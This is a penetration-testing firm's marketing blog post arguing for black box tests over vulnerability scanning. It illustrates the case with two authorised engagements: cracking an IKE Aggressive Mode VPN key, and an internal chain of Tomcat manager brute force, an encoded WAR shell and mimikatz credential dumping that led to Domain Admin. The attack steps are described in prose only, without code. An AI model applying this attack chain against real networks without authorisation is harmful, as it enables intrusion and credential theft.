• Training
    • Overview
    • Schedule
    • Catalog
    • Training Reviews
    • Delivery Options
    • About Our Training
    • Exam Pass Guarantee
    • Student Funding
    • Alpine Security GSA Schedule
    • DoD 8570/8140 Approved Training
  • Services
    • Overview
    • Medical Device Cybersecurity
    • CISO-as-a-Service
    • Penetration Testing
    • DFARS and CMMC Compliance Audit
    • Breach Prevention Audit
    • Cybersecurity Risk Management Program
    • Enterprise Security Audit
    • Alpine Services Reviews
  • Blog
  • News
  • About Us
    • About Us
    • Meet The Team
    • Why Alpine?
  • Contact
CISO Global (formerly Alpine Security)CISO Global (formerly Alpine Security)
CISO Global (formerly Alpine Security)CISO Global (formerly Alpine Security)
  • Training
    • Overview
    • Schedule
    • Catalog
    • Training Reviews
    • Delivery Options
    • About Our Training
    • Exam Pass Guarantee
    • Student Funding
    • Alpine Security GSA Schedule
    • DoD 8570/8140 Approved Training
  • Services
    • Overview
    • Medical Device Cybersecurity
    • CISO-as-a-Service
    • Penetration Testing
    • DFARS and CMMC Compliance Audit
    • Breach Prevention Audit
    • Cybersecurity Risk Management Program
    • Enterprise Security Audit
    • Alpine Services Reviews
  • Blog
  • News
  • About Us
    • About Us
    • Meet The Team
    • Why Alpine?
  • Contact

Black Box Penetration Test Advantages

Black Box Penetration Test Advantages

 Black Box Penetration Testing Black Box Penetration Testing

The advantages of a Black Box Penetration Test are many.  Black Box Penetration Testing finds issues that simple vulnerability scanning will not discover.  A Black Box Penetration Test is an unauthenticated test – a penetration test where little information is known about the target, other than maybe an IP address, URL, or building location. In essence, the target’s environment is a “black box”. As ethical hackers, we have to determine what’s inside the black box and how to exploit vulnerabilities discovered within the black box.

Rather than speak of theory about the advantages of a Black Box Penetration Test, we’ll discuss some specific scenarios where we discovered major (critical) issues because we used Black Box Penetration Testing. These critical findings were missed by vulnerability scanners.

Scenario 1: External Black Box Penetration Test – Internet Key Exchange (IKE) Aggressive Mode Issue

In this engagement, the client had a VPN Server with IKE Aggressive Mode enabled. In IKE Aggressive mode, the authentication hash is based on a Pre-Shared Key (PSK). The hash is transmitted in response to the initial packet of a VPN client trying to establish an IPSec Tunnel. This hash is not encrypted. This allows an attacker to grab the hash for offline cracking.

In this scenario, we used Nessus, a vulnerability scanner.  Nessus identified the vulnerability with IKE Aggressive Mode as Medium Risk. As part of our penetration test, we captured the VPN PSK hash. We were able to crack the password in 19 minutes. This allowed us to connect to the client’s VPN, which had access to critical systems with Protected Health Information (PHI) on them. We reported this to the client immediately as a Critical finding, despite the “Medium” finding Nessus provided. The client resolved the issue by using a much stronger passphrase and also configuring the VPN with two stages of authentication.  After the VPN passphrase, the VPN client is now prompted for Active Directory credentials.

The end result of this scenario is less risk for this client and better protection of PHI. A “medium” finding, according to Nessus, may not have been treated seriously or ever “gotten around to”.  Our Black Box Penetration Test yielded a Critical finding, which was resolved immediately.

Scenario 2: Internal Black Box Penetration Test – Owning the Domain

 The Black Box Penetration Test revealed a Critical finding that resulted in full Active Directory Domain compromise The Black Box Penetration Test revealed a Critical finding that resulted in full Active Directory Domain compromise

This engagement involved an on-site Black Box Penetration Test. During this engagement, we visited the client’s facility, saw a free cubicle, unplugged the network cable from the computer at the cubicle, and plugged it into our laptop. We then performed reconnaissance on the network. Our nmap results showed several web servers running on multiple ports. Manually browsing to the web servers, we discovered one of them was running the Tomcat manager interface. We used a Metasploit tool to crack the Tomcat manager interface username and password. This allowed us to deploy a war file to the server. The war file contained a payload that we encoded to avoid antimalware. We were able to browse to our deployed “package” on the web server, which gave us a shell. From there, we ran mimikatz to dump credentials from RAM. One of the credentials we dumped from RAM was an Active Directory domain “service” account. This account was a Domain Admin account. At this point, we called off the engagement and worked with the client to mitigate these issues.

It is worth noting that in this scenario, the client routinely performed vulnerability scanning and the vector we used to gain complete access was never identified as a vulnerability with the vulnerability scanning software.

The outcome of this scenario resulted in the client implementing several security controls, including 802.1x, changing service account permissions, removing unnecessary services, and creating stronger passwords.

Unfortunately, many organizations have a false sense of security because they run a vulnerability scanning tool on a routine basis. We certainly believe this is a great step in the right direction, however, a vulnerability scanning tool does not catch everything. If you’re concerned about the true cybersecurity risk to your organization, consider a Black Box Penetration Test.

Contact us with questions or to purchase a Black Box Penetration Test.

Related


 

Penetration Testing for Compliance: The Top 5 Laws and Regulations that Require Testing


 

Black Box Penetration Testing Explained


 

digitalworld.local: BRAVERY Walkthrough


 

Mr. Robot Walkthrough (Vulnhub)


 

sqlmap: Sucking Your Whole Database Through a Tiny Little Straw


 

Hacking Humans with Nanotechnology


 

A Penetration Testing Career – Do You Have What It Takes?


 

Top Penetration Testing Certifications


 

The History of Penetration Testing


 

Web Application Penetration Testing: Why It’s Necessary and What You Need to Know

Tags: black box penetration testethical hackingike aggressive modenessuspenetration testingTomcat Managervulnerability scanning
Share

You also might be interested in

ECSA Review by a Senior Penetration Tester

ECSA Review by a Senior Penetration Tester

Feb 9, 2017

Online Password Cracking: The Attack and the Best Defense Against It
Digitally generated cyber hacking image

Online Password Cracking: The Attack and the Best Defense Against It

Mar 26, 2017

OSCP vs LPT (Master): A Comparison by Someone with Both

OSCP vs LPT (Master): A Comparison by Someone with Both

Jul 20, 2017

BLOG SEARCH:

Connect with Us

Interested in our cybersecurity training or services? Complete the form below and we’ll get back with you right away. We appreciate your interest.


Recent Posts

  • The State of Ransomware 2020
  • National Cybersecurity Awareness Month: 6 Things to Practice During the Month
  • Cybersecurity Checklist for Business Closures, Consolidations, and Acquisitions
  • What Is DevSecOps?
  • Cybersecurity and a Remote Workforce: What Does the Future Look Like?
  • 6 Penetration Testing Trends to Have on Your Cybersecurity Radar
  • Incorporating Privacy and Security by Design into MedTech
  • What is the Difference Between CMMC, DFARS, and NIST 800-171?
  • At Risk: Medical Device Cybersecurity Vulnerabilities Expose Patients to Life-threatening Consequences
  • 5 Reasons to Hire a Fractional CISO
  • Why Private Cybersecurity Training Matters for Your Organization
  • Is the CEH Certification Right For You?
  • Internal Penetration Test vs Vulnerability Assessment: Which is Right for You?
  • Best Beginner Cybersecurity Certification to Get
  • Penetration Testing for Compliance: The Top 5 Laws and Regulations that Require Testing

Alpine Security is a member of the CISO Global family of companies.

Contact Us:

  • CISO Global
  • 6900 E. Camelback Road, Suite 900 Scottsdale, AZ 85251
  • 480-389-3444
  • info@ciso.inc
  • www.ciso.inc

Get Info

About Our Training
About Our Services
Meet the Team
Blog
Terms of Use
Privacy Policy

Join The Community

  • Facebook
  • LinkedIn
  • Twitter
  • YouTube
  • Mail

Proud Partners

© 2021 · Alpine Security, a Cerberus Sentinel Company

Prev Next